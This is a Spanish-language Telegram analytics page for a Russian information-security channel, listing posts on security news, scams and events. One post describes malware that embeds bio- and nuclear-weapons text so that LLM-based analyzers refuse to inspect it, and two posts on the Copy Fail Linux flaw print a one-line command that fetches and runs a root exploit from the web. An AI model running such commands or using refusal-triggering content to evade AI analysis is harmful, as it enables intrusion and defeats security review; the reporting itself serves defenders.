¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
Информационная опасность
Ir al canal en Telegram
Mostrar más
1 297
Suscriptores
+324 horas
+277 días
+3230 días
Carga de datos en curso...
Canales Similares
Nube de Etiquetas
Menciones Entrantes y Salientes
---
---
---
---
---
---
Atraer Suscriptores
junio '26
junio '26
+34
en 0 canales
mayo '26
+33
en 0 canales
Get PRO
abril '26
+75
en 1 canales
Get PRO
marzo '26
+68
en 1 canales
Get PRO
febrero '26
+27
en 0 canales
Get PRO
enero '26
+24
en 0 canales
Get PRO
diciembre '25
+62
en 0 canales
Get PRO
noviembre '25
+2 846
en 2 canales
Get PRO
octubre '25
+47
en 0 canales
Get PRO
septiembre '25
+26
en 0 canales
Get PRO
agosto '25
+97
en 1 canales
Get PRO
julio '25
+47
en 6 canales
Get PRO
junio '25
+105
en 2 canales
Get PRO
mayo '25
+100
en 5 canales
Get PRO
abril '25
+159
en 7 canales
Get PRO
marzo '25
+86
en 15 canales
Get PRO
febrero '25
+169
en 8 canales
Get PRO
enero '250
en 2 canales
Get PRO
diciembre '24
+12
en 4 canales
Get PRO
noviembre '24
+15
en 2 canales
Get PRO
octubre '24
+78
en 1 canales
Get PRO
septiembre '240
en 0 canales
Get PRO
agosto '24
+116
en 2 canales
Get PRO
julio '240
en 1 canales
Get PRO
junio '24
+11
en 0 canales
Get PRO
mayo '240
en 0 canales
Get PRO
abril '24
+23
en 0 canales
Get PRO
marzo '240
en 0 canales
Get PRO
febrero '240
en 0 canales
Get PRO
enero '24
+2
en 0 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 15 junio | +3 | |||
| 14 junio | +23 | |||
| 13 junio | +4 | |||
| 12 junio | 0 | |||
| 11 junio | +1 | |||
| 10 junio | 0 | |||
| 09 junio | 0 | |||
| 08 junio | 0 | |||
| 07 junio | +1 | |||
| 06 junio | +2 | |||
| 05 junio | 0 | |||
| 04 junio | 0 | |||
| 03 junio | 0 | |||
| 02 junio | 0 | |||
| 01 junio | 0 |
Publicaciones del Canal
Правительство США потребовало экстренно отключить доступ к Fable 5 и Mythos 5
"Правительство США, ссылаясь на органы национальной безопасности, издало директиву по экспортному контролю, запрещающую доступ к Fable 5 и Mythos 5 для всех иностранных граждан, как внутри, так и за пределами Соединенных Штатов, включая иностранных сотрудников Anthropic. В результате этого распоряжения мы вынуждены внезапно отключить доступ к Fable 5 и Mythos 5 для всех наших клиентов, чтобы обеспечить соблюдение требований."
| 2 |  Исследователи обнаружили любопытную деталь в новой кампании Mini Shai-Hulud, Miasma и Hades. Авторы вредоносного кода начали добавлять в свои пакеты текстовые блоки про биологическое и ядерное оружие. Не потому, что они внезапно заинтересовались массовым поражением человечества.
Цель намного современнее.
Если файл попадёт на анализ к системе, использующей LLM, есть шанс, что модель увидит чувствительный контент, решит, что перед ней опасный запрос, и откажется проводить анализ. Проще говоря, вредоносная программа пыталась спрятаться за собственным safety-фильтром искусственного интеллекта.
Десятилетиями вредоносный код писался для компьютеров и маскировался от компьютеров. Потом появились методы, рассчитанные на обман исследователей. Теперь появился новый класс техник, рассчитанных на обман ИИ.
Фактически мы наблюдаем первые признаки того, что злоумышленники начали воспринимать большие языковые модели как полноценную часть защитной инфраструктуры. Если раньше нужно было обходить сигнатуры антивируса или эвристики песочницы, то теперь появляется ещё одна поверхность атаки — поведение модели.
Последние несколько лет крупнейшие разработчики моделей соревновались в том, кто лучше научит ИИ отказываться отвечать на опасные запросы. Но любой механизм отказа можно превратить в механизм уклонения. Если защитная система автоматически отдаёт подозрительный файл модели на анализ, злоумышленник рано или поздно попробует заставить эту модель замолчать.
Собственно, это и произошло.
Нельзя просто взять LLM, поставить её в центр процесса анализа и надеяться, что всё будет хорошо. Потому что как только модель становится частью защитного контура, она автоматически становится целью атакующих.
Мы только начинаем видеть первые эксперименты в этом направлении.
@gostev_future | 324 |
| 3 |  Sin texto... | 757 |
| 4 |  🦊 В Firefox появился бесплатный встроенный VPN
Начиная с версии 150, Mozilla сделала общедоступной функцию защиты IP-адреса.
Инструкция по включению:
• Введите about:config в адресной строке браузера и нажмите Enter (согласитесь с принятием риска).
• В строке поиска введите параметр: browser.ipProtection.enable
• Переключите его значение в состояние true (двойным кликом или кнопкой переключения).
• Обязательно войдите в свой аккаунт Mozilla.
• На панели инструментов появится новая иконка 🛡️ — теперь через неё можно включать и настраивать VPN.
Что дает бесплатная версия: 5 стран на выбор: США, Канада, Великобритания, Франция и Германия.
(Нюанс: на практике пока часто определяется только сервер в США. Вероятно, распределение нод всё ещё находится в стадии BETA).
50 ГБ трафика ежемесячно.
Использование только на 1 устройстве. | 859 |
| 5 | https://habr.com/ru/news/1034958/ | 717 |
| 6 |  Sin texto... | 772 |
| 7 |  Sin texto... | 1 380 |
| 8 |  Sin texto... | 1 062 |
| 9 | Главная Хобби и отдых Билеты и путешествия
после такого хобби дадут билет на путешествие по северным широтам, да и сами схемы за 1000 рублей выглядят сомнительными.
Продавец ОГРН. 321595800039521. Дата регистрации: 26 апреля 2021. Пермский край, р-н Чернушинский, г Чернушка.
https://www.avito.ru/moskva/bilety_i_puteshestviya/shema_zarabotka._darknet_4_8161602322 | 979 |
| 10 |  Мы знаем, вы готовились к маю.
Слайды собраны. Демо отрепетировано. Эксплойты дозрели. PoC лежит в репе, постукивает крышкой. Доклад прорастал всю зиму.
Не пропадать же добру.
Если есть доклад, который берегли на май — несите.
Если есть тулза, которую хочется показать — несите.
Если есть история, которую лучше рассказать вслух, чем ещё год держать в заметках — тем более несите.
Шлите сабмиты. Триаж быстрый — двое, ноутбук, кофе. Без программного комитета на полста человек. Без NDA на абстракт. Без согласований с пиаром, юристами и Иваном Иванычем из соседнего отдела.
Прислал — получил ответ. Ок — выступаешь.
Любим: технические доклады, живой ресёрч, честные разборы, демо, факапы из которых можно что-то вынести, странные идеи, которые давно хотелось показать своим.
Не любим: sales pitch, «наш продукт решает всё», рекламный маскарад под технический контент, «я закинул в LLM…».
Привилегий не предусмотрено. Гонораров нет. Бизнес-класса нет. Лаунж-зоны нет. Корзинки с фруктами в номере нет. Номера, кстати, тоже нет.
Что есть: паллет (можно сесть), проектор (можно показать), микрофон (можно сказать), люди (можно поговорить).
Возможно — футболки. Если успеем напечатать.
Хорошо?
Куда нести: сабмитилку готовим — будет на pretalx, дадим ссылку. Не хочется ждать или не подходит pretalx
— пиши на qqlan@ya.ru или тыкай @yoprtsorgs в телеге.
Тема — «сабмит на ёprstcon», в письме — название, абстракт, формат, контакт. Этого хватит.
https://www.yoprst.me/
ЗЫ. Онлайн-докладам — те же правила. Ноутбук тоже считается паллетом.
#yoprtscon #ёprst #cfp | 746 |
| 11 |  Sin texto... | 664 |
| 12 |  Dirty Frag: Universal Linux LPE
Появилась публичная информация о Dirty Frag — новом классе LPE-уязвимостей в Linux, позволяющем локальному непривилегированному пользователю получить root за счет записи в page cache через сетевые буферы ядра.
Исследователь Hyunwoo Kim описывает цепочку из xfrm-ESP и RxRPC Page-Cache Write; заявлено, что эксплуатация не требует race condition и имеет высокую надежность. Наибольший риск — для серверов с контейнерами, Kubernetes, CI/CD runners, shared-хостинга и любых систем, где недоверенный код может запускаться локально.
Dirty Pipe в 2022 показал возможность атаковать page cache через pipes. Copy Fail недавно продемонстрировал похожий класс проблемы через AF_ALG. DirtyFrag продолжает ту же линию — page cache write через ESP и RxRPC. Три разные подсистемы ядра, но один повторяющийся класс ошибок.
До выхода backport-патчей рекомендуется оценить использование esp4/esp6/rxrpc, временно отключить соответствующие модули там, где это безопасно, и оперативно обновить ядро после публикации исправлений дистрибутивом. | 612 |
| 13 | Dirty Frag: Universal Linux LPE
/не успели отойти от Copy Fail, как подъехала очередная not-RCE LPE/
Появилась публичная информация о Dirty Frag — новом классе LPE-уязвимостей в Linux, позволяющем локальному непривилегированному пользователю получить root за счет записи в page cache через сетевые буферы ядра. Исследователь Hyunwoo Kim описывает цепочку из xfrm-ESP и RxRPC Page-Cache Write; заявлено, что эксплуатация не требует race condition и имеет высокую надежность. Наибольший риск — для серверов с контейнерами, Kubernetes, CI/CD runners, shared-хостинга и любых систем, где недоверенный код может запускаться локально. До выхода backport-патчей рекомендуется оценить использование esp4/esp6/rxrpc, временно отключить соответствующие модули там, где это безопасно, и оперативно обновить ядро после публикации исправлений дистрибутивом. | 0 |
| 14 |  +3⚠️ Покупка вашего никнейма в телеграм- схема развода под видом сделки на Fragment / TON ⚠️
/учитывая возросший курс - схема будет применятся чаще.
Мошенники пишут владельцам Telegram-юзернеймов и предлагают “выкупить” ник за крупную сумму в TON. Дальше присылают фейковую страницу “Fragment / Trade Info”, где якобы уже создана сделка, средства “заблокированы в escrow”, а покупатель “ждёт подтверждения”.
Сначала просят подключить TON-кошелёк через TON Connect. Затем появляется ошибка Insufficient funds и требование пополнить кошелёк на “5% от суммы сделки” для активации смарт-контракта.
❗️Это развод.
В нормальной сделке на Fragment продавец не должен заранее вносить сотни TON, чтобы “получить оплату”. Любые фразы вроде:
— “offer has already been paid”
— “sign up to accept it”
— “funds are locked in smart-contract escrow”
— “top up your wallet with 5%”
— “deal will expire soon”
— это красные флаги.
Что делать:
✅ не подключать кошелёк к сомнительным mini app;
✅ не подписывать транзакции;
✅ не пополнять кошелёк “для активации”;
✅ проверять сделки только через официальный Fragment, вручную открывая сайт;
✅ если кошелёк уже подключён — отключить приложение в TON Connect / Connected Apps.
Главная цель мошенников — заставить вас пополнить кошелёк и подписать транзакцию, после чего TON или активы могут уйти безвозвратно.
Берегите свои ники, кошельки и TON. | 814 |
| 15 |  OWASP RUSSIA MEETUP: AI в анализе кода, SSR-безопасность, атаки на CMS, Telegram-фишинг и ML в AppSec
14 мая состоится OWASP RUSSIA MEETUP — встреча для специалистов по информационной безопасности, разработчиков, AppSec/SRE/DevSecOps-инженеров, инфраструктурных команд и всех, кому интересны современные практики защиты приложений.
В программе — доклады о графовых подходах в анализе кода, рисках SSR на примере React2Shell, атаках на установщики CMS, сценариях Telegram-фишинга через QR-коды и балансе между ML-подходами и классическими правилами в AppSec.
Программа митапа
19:00 — Приветственное слово
Лука Сафонов, OWASP Russia chapter leader
Модератор: Павел Кузнецов, Инфосистемы Джет
19:10 — AI + анализ кода: графовые подходы и почему они снова актуальны
Радда Юрьева, PT
Доклад будет посвящён тому, как CPG/PDG-графы становятся основой для контекстного поиска уязвимостей в коде.
Ключевые темы:
CPG/PDG-графы в анализе кода;
контекстный поиск уязвимостей;
связка графовых подходов с LLM;
применение графовых нейросетей в задачах AppSec.
19:55 — Риски безопасности SSR на примере React2Shell и их митигация
Артем Чувикин, Ngenix
Современные web-приложения всё чаще используют server-side rendering, что улучшает производительность, SEO и пользовательский опыт, но одновременно расширяет поверхность атаки. На примере React2Shell будут разобраны риски, возникающие в SSR-архитектуре, и способы их снижения.
Ключевые темы:
особенности безопасности SSR-приложений;
attack surface server-side React;
уязвимость React2Shell;
практическая эксплуатация на демонстрационном приложении;
virtual patching через WAF, CDN и reverse proxy.
20:35 — Перерыв
20:50 — Атаки на установщики CMS: как захватить контроль над ещё не установленной системой
Александр Колчанов, независимый эксперт
Доклад посвящён сценарию, при котором атакующий находит доступные установщики CMS и использует их для получения контроля над сервером ещё до полноценной установки системы.
Ключевые темы:
поиск открытых установщиков CMS;
получение доступа к админке через процесс установки;
загрузка shell;
удаление установленной CMS и восстановление установщика;
захват контроля без эксплуатации типовых CVE.
21:30 — Как я украду вашу телегу
Михаил Жмайло, CICADA8
QR-код давно стал привычным способом аутентификации во многих приложениях. В докладе будут разобраны фишинговые атаки на QR-аутентификацию, сценарии QRLjacking и использование Telegram как платформы для атак социальной инженерии.
Ключевые темы:
QRLjacking;
фишинговые атаки через Telegram;
захват аккаунта через QR-код;
вредоносный MiniApp;
автоматизация сбора информации;
persistence в Telegram-сценариях.
22:10 — Баланс точности и полноты: ML vs ifчики
Павел Конан, Yandex
Индустрия кибербезопасности активно продвигает AI-powered-решения, противопоставляя их классическим сигнатурам и правилам. Но на практике выбор между ML и rule-based-подходами почти всегда упирается в компромисс между Precision и Recall.
Ключевые темы:
ML против правил и эвристик в AppSec;
компромисс между Precision и Recall;
False Positive и False Negative в WAF и SAST;
alert fatigue у разработчиков;
архитектурные паттерны security-инструментов;
чек-лист: когда нужен ML, а когда достаточно rule-based-подхода.
22:50 — Завершение
Участие в митапе бесплатное и осуществляется по предварительной регистрации. Ссылка на место проведения (Москва) будет отправлена на email.
До встречи 14 мая! | 548 |
| 16 |  Sin texto... | 825 |
| 17 |  Sin texto... | 1 020 |
| 18 |  Copy Fail: новая LPE-уязвимость в Linux (root на любом Linux в один клик)
Copy Fail — CVE-2026-31431, уязвимость в ядре Linux, которую исследователи называют почти идеальным LPE: обычный локальный пользователь может получить root без race condition, без подбора оффсетов и без сложной подготовки.
Авторы заявляют, что один и тот же 732-байтный Python PoC срабатывает на крупных Linux-дистрибутивах, выпущенных с 2017 года. Подтверждены демо на Ubuntu, Amazon Linux, RHEL и SUSE.
Суть бага — логическая ошибка в криптографической подсистеме Linux: цепочка authencesn → AF_ALG → splice() приводит к контролируемой записи в page cache. Итог — возможность модифицировать поведение setuid-бинарника и выйти в root.
Это не удалённая RCE сама по себе: атакующему нужен локальный доступ или запуск кода на машине. Но для shared-хостов, CI/CD runners, Kubernetes-кластеров, песочниц, dev-серверов и SaaS-платформ с пользовательским кодом это выглядит максимально неприятно: контейнер или обычный пользователь могут стать проблемой уровня хоста.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user) | 860 |
| 19 | Copy Fail: новая LPE-уязвимость в Linux
Copy Fail — CVE-2026-31431, уязвимость в ядре Linux, которую исследователи называют почти идеальным LPE: обычный локальный пользователь может получить root без race condition, без подбора оффсетов и без сложной подготовки.
Авторы заявляют, что один и тот же 732-байтный Python PoC срабатывает на крупных Linux-дистрибутивах, выпущенных с 2017 года. Подтверждены демо на Ubuntu, Amazon Linux, RHEL и SUSE.
Суть бага — логическая ошибка в криптографической подсистеме Linux: цепочка authencesn → AF_ALG → splice() приводит к контролируемой записи в page cache. Итог — возможность модифицировать поведение setuid-бинарника и выйти в root.
Это не удалённая RCE сама по себе: атакующему нужен локальный доступ или запуск кода на машине. Но для shared-хостов, CI/CD runners, Kubernetes-кластеров, песочниц, dev-серверов и SaaS-платформ с пользовательским кодом это выглядит максимально неприятно: контейнер или обычный пользователь могут стать проблемой уровня хоста.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user) | 0 |
| 20 |  Sin texto... | 0 |
